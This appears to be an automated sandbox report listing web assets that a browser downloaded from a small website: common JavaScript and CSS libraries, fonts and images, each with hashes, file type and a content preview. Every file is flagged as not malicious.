                                                        Preview:/*. Copyright (C) Federico Zivolo 2018. Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT).. */(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&&define.amd?define(t):e.Popper=t()})(this,function(){'use strict';function e(e){return e&&'[object Function]'==={}.toString.call(e)}function t(e,t){if(1!==e.nodeType)return[];var o=getComputedStyle(e,null);return t?o[t]:o}function o(e){return'HTML'===e.nodeName?e:e.parentNode||e.host}function n(e){if(!e)return document.body;switch(e.nodeName){case'HTML':case'BODY':return e.ownerDocument.body;case'#document':return e.body;}var i=t(e),r=i.overflow,p=i.overflowX,s=i.overflowY;return /(auto|scroll|overlay)/.test(r+s+p)?e:n(o(e))}function r(e){return 11===e?re:10===e?pe:re||pe}function p(e){if(!e)return document.documentElement;for(var o=r(10)?document.body:null,n=e.offsetParent;n===o&&e.nextElementSibling;)n=(e=e.nextElementSibling).offsetParent
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:Web Open Font Format (Version 2), TrueType, length 7832, version 1.0
                                                        Category:downloaded
                                                        Size (bytes):7832
                                                        Entropy (8bit):7.973030197794656
                                                        Encrypted:false
                                                        SSDEEP:192:6ULCWK5hmsOUo9TcOk0WS0+2ydfNbaBGW4:6ULvKTOxkJkBwMl
                                                        MD5:F4F17FD53C7D040E56F91A3ECB692B22
                                                        SHA1:1B51342175762634835645BA2F99CD3AB0AC615C
                                                        SHA-256:B0B43E548E691662DAC85B1DC159D148A273D5CB9139F3FCF457CDEEBE7BDF3F
                                                        SHA-512:4C8E566CF7FFCCDB5592D4DC6F6A991A8E975473C43172F2D55E03D3196DF67FAE02728A7E5170B6182A2E9AE3FE3004CC93008C9664CB37B6DB64340A023AF4
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://www.36fg.com/static/fonts/pxibyp8kv8jhgfvrlcz7z1xlfq.woff2
                                                        Preview:wOF2..............>P...F......................... .0.`..T.......6..6.$..h. ..D.....03.1...3n.(..e._&hG...FX...Eq.3QL.SG..;...C.B.J{...j+n.4&.'j?.{?..J .0....B.e..e.uDB..Nnx~.=.^.6m.D.......TY.`b.V.\...;W7.7].UmW..^_.?../k..D0O..Y..R...=.......F.5.;...*]N.6....^......Jm..BX...$...R..Mz..t...p.>F.U.n.P.2u.....lI...$..^..C.^...wC... ...z...%5P......_.S.rv&..*..d0.?.....9l..B..D.B...............'.\..5.....p....P/....y.e.../.O...:..}..+XM.Wy|...E.....vx.......5..x..g.*`.O@.....,.x...`..k...[.1......j_.&....0.x..s...m........=.S.`B0.P......]k........{.....N<:.h...#...n=..`.{.`P^w.......>....._.`......0..C,*.w..<f.S.......s.3;.......2.:.<..^.c.L.'..{.K"..N.....=k.... ..3g.@.........Z,J....4.0.5........V....%..>.... ;..I..L.N.N.Gc5....Tsc..+R.M...V:..iF...W....>...a.Q..B_.[..'dQ..F.....;.....c.u`.7.{G.9...57.....4.i.../;~......~mlSo..../.|.....|..7bl..(..W./.*........Y......3.(.(.txh.....c.n...v&P......Z.m.].....I.@.>ZZ7X/u;..."S{.....\.....j[....=....
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:Web Open Font Format (Version 2), TrueType, length 28968, version 1.0
                                                        Category:downloaded
                                                        Size (bytes):28968
                                                        Entropy (8bit):7.993120978157846
                                                        Encrypted:true
                                                        SSDEEP:768:TdFItTkcz/TM8kQeXIfXC+Isv2KCFqVkxL:HItTkczLM8k9XEXn2Nme
                                                        MD5:B91FAE466C698C775ADB2AE92CECC8B2
                                                        SHA1:5C9B89FCD9DEE91910506375B316C59AEF97E47B
                                                        SHA-256:045469F2D577C2AD73219BBD713640BCB4A4F9A46CECC6C0DF0E66338646B27F
                                                        SHA-512:292B6E990425741188F29727D5F2959B8B1E602716CF1E34DBF23223516EE45623B9F5512E083BF2C78A7B57705E9D68F56AF250A60C461AE45E99F9D479A28B
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://www.36fg.com/static/fonts/4icv6kvjbnbylgocxcvjsgyn.woff2
                                                        Preview:wOF2......q(.......d..p................................`..V..p.....#.....`.........H.6.$..,. ..^..j....H.W..v."..._..6...cnG".....6O....~\:.....j.!cqL.`nS.*.{ .G..^3......n#..e...|..&...5.+.DJ.^TY..,..hj..0....q.D.C...4.z....g....^.$q%l.........rM..EY(.7. ....DHn.....|..85...-....../.H..GG....*....OZi..F.F^'...OL1y.v......_n..&Do*...2..Rc....JF.....3Y.........U.>..{.{.G=#.v.../.M8.Z....u........@.4......U.....Z$.1z0".....U......M...#..u~.....-+.....[..\>*...k......?5...=..!... @0..H.C..J....o....fkA..juH%u.....vH+....{&.NY......$M..]MH..ET..o...$...,."EI,...bLX.+2.:;..^..(\.q.bM_,......... ..@.Z....n6..9...uf.I...yFq...../.x.!....L..^...,...:t......L....7.u...:......N........|......&.;...E).......1=6....K.. *..0..`N....R.&U...."./..1i.an.<.}.|.Q..(.\.F.v"........6..A`...C.. kL.jS.q....(pw.'.....-...7k.9at.d..>.=/...Q...E.....+..UQ...<B:.....Iyn@.5...re...V..&....I...!g.0....=...h..WB$d.$..B.....Ed..UfvaN.B...4.fk.........{N.......!...].w.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (65321)
                                                        Category:downloaded
                                                        Size (bytes):140939
                                                        Entropy (8bit):5.058546998043583
                                                        Encrypted:false
                                                        SSDEEP:1536:Ju1QWSUPBT+QYYDnDEBi82NcuSEz/NvT/gIENM6HN26e:o1L7PDxYIENM6HN26e
                                                        MD5:B9D7200D25380CBDDB8A3F30EEC63512
                                                        SHA1:E404822DC3B149B0138A394E7FEE003F1D88D1D4
                                                        SHA-256:4868AC8A2F83D50AE9C94374D229D02DD394BD029532E607B5392EEA13F083BD
                                                        SHA-512:A45608DBBA4E54E6BE6B20EA08F1F7EAA822FE943917A2CE40B511B52293AA912C1D5D133891C6E74A0AAEC8A4C2DA51EAA5B122CAD1FE24CA1094FC94C5005C
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://www.36fg.com/static/css/bootstrap.min.css
                                                        Preview:./*!. * Bootstrap v4.1.3 (https://getbootstrap.com/). * Copyright 2011-2018 The Bootstrap Authors. * Copyright 2011-2018 Twitter, Inc.. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */:root{--blue:#007bff;--indigo:#6610f2;--purple:#6f42c1;--pink:#e83e8c;--red:#dc3545;--orange:#fd7e14;--yellow:#ffc107;--green:#28a745;--teal:#20c997;--cyan:#17a2b8;--white:#fff;--gray:#6c757d;--gray-dark:#343a40;--primary:#007bff;--secondary:#6c757d;--success:#28a745;--info:#17a2b8;--warning:#ffc107;--danger:#dc3545;--light:#f8f9fa;--dark:#343a40;--breakpoint-xs:0;--breakpoint-sm:576px;--breakpoint-md:768px;--breakpoint-lg:992px;--breakpoint-xl:1200px;--font-family-sans-serif:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,"Helvetica Neue",Arial,sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji";--font-family-monospace:SFMono-Regular,Menlo,Monaco,Consolas,"Liberation Mono","Courier New",monospace}*,::after,::before{box-sizing:border-bo
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text
                                                        Category:downloaded
                                                        Size (bytes):3395
                                                        Entropy (8bit):3.9987110724620725
                                                        Encrypted:false
                                                        SSDEEP:48:8JpkmgcJkVj54P5qQifMOyV/lNEIhN9HyKYyHBvd4Tp/Lq/yQvR9/UHMnwMUeyD8:8Pngi8UqT5MKKBf/yuR55yDayT/yP
                                                        MD5:785EBE8680B662B5B9A8C8D8EB597F1E
                                                        SHA1:6633B3F07BAE3355F59CE0CE91C5E6A90D1DBB47
                                                        SHA-256:2DD651E4D434C0A70281D7DFF55FCD5544462A7DA5A0DECD5D9081EDE130319C
                                                        SHA-512:2FC5BE7592CFF984017EF1B2BCCA1A6F56E9CC97A63619A4A361572BAB4C65F7D9F44F35DCD619F8FD66184D88ED5584DFBBD99E89B12CCA9665467354A08F88
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://www.36fg.com/static/js/main.js
                                                        Preview:(function ($) {. "use strict";.. /*----------------------------. ..preloader active. .------------------------------*/.. $(window).on('load', function () {. jQuery(".preloader").fadeOut(500);. });.. /*----------------------------. ..sticky Header. .------------------------------*/.. $(window).on('scroll', function () {. var scroll = $(window).scrollTop();. if (scroll < 2) {. $(".header-area").removeClass("sticky");. } else {. $(".header-area").addClass("sticky");. }. });.. /*----------------------------. ..main menu Active. .------------------------------*/.. jQuery('#mobile-menu').meanmenu({. meanMenuContainer: '.mobile-menu',. meanScreenWidth: "991". });.. /*----------------------------. ..search form Active. .------------------------------*/.. $('#close-btn').on('click', function () {. $('#search-overlay').fadeOut();.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:Web Open Font Format (Version 2), TrueType, length 29864, version 1.0
                                                        Category:downloaded
                                                        Size (bytes):29864
                                                        Entropy (8bit):7.9923504333726125
                                                        Encrypted:true
                                                        SSDEEP:768:Y9AVTkQu2MCn7VhS0mcgeUcPswspFmcUX3EQ:nVTusVhrgRwsb5Ul
                                                        MD5:B4E565DCFC8F6CB332BE0FC03302AD99
                                                        SHA1:86BEC9DEAB5B1B78B2C3B40DF903C7D25E511763
                                                        SHA-256:97D812DA07C2319E0E64C4137B33A5D3CCFB4C06FA5AB4444F522959E27A9ED0
                                                        SHA-512:8EA28485A5FEF31D28B0D7024EA7FBEF09A21132EC57D2BE64F040E140C4A611DAC953A242F7413C4B02AAA20BEFE88FC218D0D130B27680CB4E68BD4DA03DFF
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://www.36fg.com/static/fonts/4icv6kvjbnbylgocjc3jsgyn.woff2
                                                        Preview:wOF2......t...........t?..........................$....`..V..p.....#.....<..N......H.6.$..,. ..d..j..9[]...5../[a@o.+g...CN......v...6O..(..6........D.LN{I[T.f.o...sf.%.i.*...a..#o.v......f.d..D.:'Y...E.^.O..Y.LbK2.$.....L,.E.....5-H....i2.5.&...Y...~..S........R.Q;..`.w....A......l.n...k.......`!......|U.|."....:[l.j.+.5"WO~....O..8....c.K.L..j..>...@..=.gx.A...k...2.c.*.A..n....')U{./|H.v......9T..:..|...s..s.......V..I%.J..`..Y.d..q.{-Kn.O/R..D7iR.k..D3):D&..1Lt.IL...F/}Mb.O..U..>.{ Fk.....9d.!...V.`e.w._=.$.F..4...u*f.....C..v..(...{.A.0....F.p4.(Z......07'..E..`.`...`ck6r.*..b.Fc5V`q.z...H~.+..?...,i..#......U}....J..)'9.G0.F...U.${...:. .$.._..>.U....r*.^..>`.. ..._.AtA~...N...9.....|.....0v....-..a.c.\..S..T .E...@...T...u.M..?.....<r.eXZ...kaB.N...w.L.r..?......F0.....XL.Uh.T..Or..w[.F.K.-..].......R.&s..V..^.L.Q..HB.w....t.)...T(....y$).iZ...a._u....x...` ......8]W..........h K..8..sp^....[.s&w.F...........p..Z.....JT..%.c.n..............
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 90 x 90, 8-bit/color RGBA, non-interlaced
                                                        Category:downloaded
                                                        Size (bytes):17542
                                                        Entropy (8bit):7.978461173050082
                                                        Encrypted:false
                                                        SSDEEP:192:l/Lp1LRD5wPCNOxW9D8g48Dy1hcmb0cc66Qw1m0wrr2a2qV4pVkYlXm/O7Di7kYQ:BIxW9D8T8ePcLZ62rpV5mwDiEzfL
                                                        MD5:E45832F6D5BC6F8834E4FE5EA0137AB4
                                                        SHA1:A43C7F83860AC8F56F0D67509F412DEB26B798A2
                                                        SHA-256:6DD5D8B90498343CCDFB12EF42849B5D630A2EB4A889C5B4C536101BF5B4C9D7
                                                        SHA-512:4F54A7A65F38619CFC1CA37DD9BFC3CCADCC1676C3536D9ECD95DEA68A4C7ED56F9FB1696E88E9FEF2EB5DC51CAE56617AB4F7A3E6FE99A4C2B05841F7098363
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://www.36fg.com/static/picture/blog-author.png
                                                        Preview:.PNG........IHDR...Z...Z.....8.A.....tEXtSoftware.Adobe ImageReadyq.e<...viTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:caacb473-bd35-234a-88ca-1804bf3321d4" xmpMM:DocumentID="xmp.did:3AC0E2AFFBE111E9A85BA46E7997AEC4" xmpMM:InstanceID="xmp.iid:3AC0E2AEFBE111E9A85BA46E7997AEC4" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:39ddb404-a848-5242-adf7-8b648b3adca0" stRef:documentID="xmp.did:caacb473-bd35-234a-88ca-1804bf3321d4"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>/\2Y..@.IDATx.}..dgu.K.{.....Ih..
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                        Category:downloaded
                                                        Size (bytes):3551
                                                        Entropy (8bit):5.06750251948855
                                                        Encrypted:false
                                                        SSDEEP:48:gDmg7FrNUOZ/DrLB0twb+BLIWIoPL5gH8mN1AZBFfWuU2xuzKVAIRaSl8hui:g2OlDfB0eyBMWI21gnnWsuU2vA4a48j
                                                        MD5:AE20369BFC27428A07D27C4E524FFFC9
                                                        SHA1:4311A57EA99D5F3D61698547DDE69C5DD403D050
                                                        SHA-256:931F92C7D191FE09E717C0CBE061D2D3545187D97CDAEB39065527D61113AC31
                                                        SHA-512:0D9D55C2FA0C3C55AA13DCE7D1C0752573F1DCE14DD75AE6EEBFF36992320F3CF87E0B82F6E4F421DC76376CF93B97773F666F1242D82D981FA08F75645EC409
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://www.36fg.com/static/css/meanmenu.css
                                                        Preview:.../*! #######################################################################.....MeanMenu 2.0.7...--------.....To be used with jquery.meanmenu.js by Chris Wharton (http://www.meanthemes.com/plugins/meanmenu/)....####################################################################### */..../* hide the link until viewport size is reached */..a.meanmenu-reveal {...display: none;..}..../* when under viewport size, .mean-container is added to body */...mean-container .mean-bar {.. background: rgba(0, 0, 0, 0) none repeat scroll 0 0;.. float: left;.. position: relative;.. width: 100%;.. z-index: 99;..}.....mean-container a.meanmenu-reveal {...border: 1px solid #444;...color: #444;...cursor: pointer;...display: block;...font-family: Arial,Helvetica,sans-serif;...font-size: 1px;...font-weight: 700;...height: 22px;...line-height: 22px;...margin-top: -46px;...padding: 8px 9px;...position: absolute;...right: 0;...text-decoration: none;...top: 0;...width: 22px;..}...mean-container a.meanm
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:Web Open Font Format (Version 2), TrueType, length 7988, version 1.0
                                                        Category:downloaded
                                                        Size (bytes):7988
                                                        Entropy (8bit):7.975810214387962
                                                        Encrypted:false
                                                        SSDEEP:192:WBx8OcsqAOrgPBeIvTqZ1QBzk6ZXCJqUICr1kBGiq7nLjZj:+Y0OrgP9EEpZyzv0kx
                                                        MD5:087457026965F98466618A478C4B1B07
                                                        SHA1:00B024CCB35E3694DE662D180D6EA7F56DE6D654
                                                        SHA-256:B93B9165269362989E2855D0BF0AE232D7193A45C43627B2D03B26D7EB98263B
                                                        SHA-512:00240312FE8855DA22D687B615D3E32DB64A5BCE39ACDB5B2AFBECE1FCCF85334DE8CA603EBF093105EB6E2B3ABADB32231C43F19249D48C934BD434060379E6
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://www.36fg.com/static/fonts/pxibyp8kv8jhgfvrlej6z1xlfq.woff2
                                                        Preview:wOF2.......4......?@............................. .0.`..T..t.*..6..6.$..h. ..T.....1.".8. ...E.`D..*..2.5T.P..jBh.vcu.0V...]......._.TA..Z.y-.|?..#4.I.O.......I54.fU!s.$2.f..B.+.....o{.W.X5..H..E..Fj6.:.).cx~n......ellcY.........0.Q#.C.J..h.....h.@}.F....+....B.4T...;..u......+yS.)....Qfe.....V....d..l...X....$G.j{.....2..N..:rN...~..NaV...NO.Y...s..8$.@.'9..GR.V.)..-.S....'%..S..x...*l.u..U.:.E.T....{.9.."...).KT@k{.c1.E.3..Lp.Y...6..rM..B8.9...UD+s.^-.R...63=..e..(..-..........b..!n.h.k.......e_j......=..}u.X`.m....U..S.g2.l...gr{...fo.%.6..0.,.&....#..&cMO..rN......9..f>.g..st..........,.]:.4.t|i..........}..X._..|.......v.....P..vva..6.c.R.E..9..?.i...3j...".{....&f...a...`..A.8..a.f.;..{.........1........^Z..`......!.2.....S}1...eM....5|...,...+.'...}G%\..e.......'.....j....Nk..v.......1.O8.^|.&-.........U.'E..s..N.s...d.B(...t.......H.W,..:....0.....[......y...,S.."..[...[.@...6*.N-....s.d....K.....pW..?`../3....{5.....5....U.o\.+RP..%;...R8.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (32077)
                                                        Category:downloaded
                                                        Size (bytes):97163
                                                        Entropy (8bit):5.373204330051448
                                                        Encrypted:false
                                                        SSDEEP:1536:GYE1JVoiB9JqZdXXe2pD3PgoIiulrUdTJSFk/zkZ4HjL5o8srOaS9TwD6b7/Jp9i:t4J+R3jL5TCOauTwD6FdnCVQNea98HrV
                                                        MD5:4F252523D4AF0B478C810C2547A63E19
                                                        SHA1:5A9DCFBEF655A2668E78BAEBEAA8DC6F41D8DABB
                                                        SHA-256:668B046D12DB350CCBA6728890476B3EFEE53B2F42DBB84743E5E9F1AE0CC404
                                                        SHA-512:8C6B0C1FCDE829EF5AB02A643959019D4AC30D3A7CC25F9A7640760FEFFF26D9713B84AB2E825D85B3B2B08150265A10143F82E05975ACCB10645EFA26357479
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://www.36fg.com/static/js/jquery-1.12.4.min.js
                                                        Preview:/*! jQuery v1.12.4 | (c) jQuery Foundation | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="1.12.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.ca
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:Web Open Font Format (Version 2), TrueType, length 77160, version 4.459
                                                        Category:downloaded
                                                        Size (bytes):77160
                                                        Entropy (8bit):7.996509451516447
                                                        Encrypted:true
                                                        SSDEEP:1536:/MkbAPfd1vyBKwHz4kco36ZvIaBfRPlajyXUA2jVTc:L0nXnHdfRVEAS2
                                                        MD5:AF7AE505A9EED503F8B8E6982036873E
                                                        SHA1:D6F48CBA7D076FB6F2FD6BA993A75B9DC1ECBF0C
                                                        SHA-256:2ADEFCBC041E7D18FCF2D417879DC5A09997AA64D675B7A3C4B6CE33DA13F3FE
                                                        SHA-512:838FEFDBC14901F41EDF995A78FDAC55764CD4912CCB734B8BEA4909194582904D8F2AFDF2B6C428667912CE4D65681A1044D045D1BC6DE2B14113F0315FC892
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://www.36fg.com/static/fonts/fontawesome-webfont.woff2
                                                        Preview:wOF2......-h..........-.........................?FFTM.. .`..r.....(..X.6.$..p..... .....u[R.rGa...*...'.=.:..&..=r.*.......].t..E.n.......1F...@....|....f.m.`.$..@d[BQ.$([U<+(..@P.5..`....>.P..;.(..1..l..h...)..Yy..Ji......|%..^..G..3..n........D..p\Yr .L.P.....t.)......6R.^"S.L~.YR.CXR...4...F.y\[..7n..|.s.q..M..%K......,.....L.t.'....M.,..c..+b....O.s.^.$...z...m...h&gb...v.....'..6.:....s.m.b.1.m0"....*V.....c.$,0ATPT.1.....<..;...`..'.H.?.s.:..ND.....I..$..T..[..b4........,....bl6...IL.i}.&.4.m,'....#....Rw..bu..,K......v....m_-...\H....HH.......?...m..9P...)9.J..$.....8......~.;.r..n.=$.....Nddn.!'....;...8..'.N...!.-..J.........X.=.,......"`:....... {......K!'...-FH....#$~.Z_.......N5VU8F....%.P..........Cp..$.Q.......r.....k.k...3...:R.%....2{.....h%.)8..........ILK.6v.#......,;.6..N.2.hv...........OO..t#....xT..Bf....q^.#....?{.5b.I..%-WZ..b.A...^.1..n5.....NQ.Y'.........S.....!t" .`b3..%....35....fv;....l..9.:jgf?gr..p.x. ..|.. $. e.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text
                                                        Category:downloaded
                                                        Size (bytes):1215
                                                        Entropy (8bit):4.893834869151181
                                                        Encrypted:false
                                                        SSDEEP:24:QdcZI3ztGsLlMHRTfvAdIMIPRusKssFshKi6jU:QnBF5K0S96Y
                                                        MD5:9FDD4D0F0AB7D63FD10BBC56F73B8874
                                                        SHA1:2895C175D93E8D0A6D205A9D47FC11386DB126B1
                                                        SHA-256:6F9E9742293DB7A493B19C68BC2885796C5F90E6E9449B3E633EA56780E5213D
                                                        SHA-512:8CCD207EE1F49DC7F4ECA16B2E6593BB671CF2EBD4FF32F30618255FDDAA908C6384C32164E8D7C503F7DA74155B12AB85A58BB2BC10362CA5BE08A77C3DB7CC
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://www.36fg.com/static/js/ajax-form.js
                                                        Preview:$(function() {...// Get the form...var form = $('#ajax-contact');...// Get the messages div...var formMessages = $('.form-message');...// Set up an event listener for the contact form...$(form).submit(function(e) {...// Stop the browser from submitting the form....e.preventDefault();....// Serialize the form data....var formData = $(form).serialize();....// Submit the form using AJAX....$.ajax({....type: 'POST',....url: $(form).attr('action'),....data: formData...})....done(function(response) {....// Make sure that the formMessages div has the 'success' class.....$(formMessages).removeClass('error');....$(formMessages).addClass('success');.....// Set the message text.....$(formMessages).text(response);.....// Clear the form.....$('#name').val('');....$('#email').val('');....$('#message').val('');...})....fail(function(data) {....// Make sure that the formMessages div has the 'error' class.....$(formMessages).removeClass('success');....$(formMessages).addClass('error');.....// Set the m
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 512 x 330, 8-bit/color RGBA, non-interlaced
                                                        Category:dropped
                                                        Size (bytes):6408
                                                        Entropy (8bit):7.548152833379577
                                                        Encrypted:false
                                                        SSDEEP:192:kvDGuYUHXKP1EfVyS2U/XOyAaC9EOahAHjlZB:QDrno+VyS2UvO/lEDhyF
                                                        MD5:A22087B8272E7E8C1EF5702BA943AD93
                                                        SHA1:02865BFB0C215E061F515A77882657A9ACEEE9E1
                                                        SHA-256:F4E3729058237486921233BA5EB99C641A4BFF858279FB7D36B48AB42AB9989A
                                                        SHA-512:52957B77AB19638310AE7C17CA7A183E00C6128DC14CC908FAEA542BF4DA0067D751A16F386FBB7CF24C5A6515B5F387AE8E1A7CF2201E0051A3A22559B25315
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:.PNG........IHDR.......J.....kS.m....pHYs..........+......IDATx...Ol.....(.71i..pX...X`E.v-.........K!.=$.Z..@..^...K..n...[E...:.[...D..s..C..E.....1.....WC..3.y..;3........c.........7y..I.J....&O........ ....$..@....H........ A...$H........ ....$..@....H........ A...$H........ ....$..@....H........ A...$H........ ....$..@....H........ A...$H........ ....$..@....H........ A...$H.........3U7 5k.X[.X]..%L...._F.....E.aXK../-D,.-~.........u..Q......c.....N..A.............?.....O."vjy.|V.....B.k/..~m%...8z...|.Q|?...{.y...!a.6.......7y..g7.D|p+S....Z..n.?{Z.........G..jDo....<....8..0F..X.Vu+.W.F.....G.Q.1j...k.._u.....G....'.....$}.+....B.....qe~..q.f...`,V.#..O...Ab.......H.....Z/.P..".........?.?._ L..........B.:.q..w#.~..&H..0bk+.?}G.j.......|RuK...9.....;v..?..G...U......w..'..^.|.X..zo.4.....kK..0bk+z.L.....-g....C..?.."n_.L..).`...T..8.....4C..?.. .]+F.... ....D.Qj!@...+..L......q.R...\..X]...M...Z.....%.@B....m.V..ZZ....bU?.s.R...e..Q...
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 121 x 48, 8-bit/color RGBA, non-interlaced
                                                        Category:dropped
                                                        Size (bytes):2706
                                                        Entropy (8bit):7.615552510437364
                                                        Encrypted:false
                                                        SSDEEP:48:ZAvnLPNzU8J3JB1Nw/i6PSbP/zPdoCy/MENTTqaDDex5QZGO0V1M5:uuW9wVSfjylN/reQ4O0V14
                                                        MD5:5CA6E96A65A8F2DD0CB92699FC47CB93
                                                        SHA1:33F2E158BB8BCB3E990FA2098914A11EE426FB47
                                                        SHA-256:5B334674EE02D7A78DC39FEFDF48538E4FE1ED6AC2FC849293F3C779A43F1F1C
                                                        SHA-512:3C82F5CACAD6C9EBA42DCE7617DEDC74929C4B73EEA7DA4EEDD7750E4AC2FAD7C06AEC15160E60B1C230F96C1B89D000F4A52AFAF62BB76604FB133DB4A7E248
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:.PNG........IHDR...y...0.....5.......tEXtSoftware.Adobe ImageReadyq.e<...viTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:caacb473-bd35-234a-88ca-1804bf3321d4" xmpMM:DocumentID="xmp.did:E0D3813AFBDF11E9946AEE6A00AC5613" xmpMM:InstanceID="xmp.iid:E0D38139FBDF11E9946AEE6A00AC5613" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:b6c86112-0bef-3e4f-837b-24203171b571" stRef:documentID="xmp.did:caacb473-bd35-234a-88ca-1804bf3321d4"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>J._.....IDATx..\kh\E..k...UV...mC.*6
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:HTML document, ASCII text
                                                        Category:downloaded
                                                        Size (bytes):148
                                                        Entropy (8bit):4.3516667792216674
                                                        Encrypted:false
                                                        SSDEEP:3:qLzLURObOb0qHXbvxL4AqWrKb0GklITULLP61IWKBc4NGDFV:qLzLIkObRHXLx0AqWObtklIgLP8IWKqz
                                                        MD5:630E1F9FEF1A483FE84154E2D0D046DF
                                                        SHA1:F10E0CF39FB920A438116CAAEA80A71E0DCDC162
                                                        SHA-256:9CAD3CFF676946810A81047247F12E4E51FACCC01DF4134EDFD871AEE8BA0956
                                                        SHA-512:33F8257B60C25704F0856806337C13E8AFE964C5B075D80F15ABD87FFA59FF0329F12DE0C4B5978D4640D5B70C0A997C0C239F422D4DA5BBDCB3727C281CFCDA
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://www.36fg.com/static/fonts/top-arrow.svg
                                                        Preview:.<html>.<head><title>404 Not Found</title></head>.<body>.<center><h1>404 Not Found</h1></center>.<hr><center>nginx</center>.</body>.</html>.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 121 x 48, 8-bit/color RGBA, non-interlaced
                                                        Category:downloaded
                                                        Size (bytes):2889
                                                        Entropy (8bit):7.64628523723061
                                                        Encrypted:false
                                                        SSDEEP:48:ZAvnLPNpXLtQQ8J3JB1NuUOv5/f4Q0Fc3eQqgHa6XozSc7oXXTLDamdyq5OLapAC:uHqQW9Mv5n4lSqkaGoz17AXTLOmDACyI
                                                        MD5:816960F634C9D78C63157D8D67F36C96
                                                        SHA1:00D22A05F8B47ED57C0B2E9903E139BC4CE11983
                                                        SHA-256:68454FE86C83A8089780A6D4852E7256637B52DD339C97611D82B50CAAC96BAD
                                                        SHA-512:88D4C92AB8B9C07B91AD09E3C043EA7B5C973BB80A039CF2E2B0FAC05D5A6963AAFBBCEFB1FD8AD15D63CC3949D6E3F771CAA8A9557E35EA96C28BF48E5E21CF
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://www.36fg.com/static/picture/logo-1.png
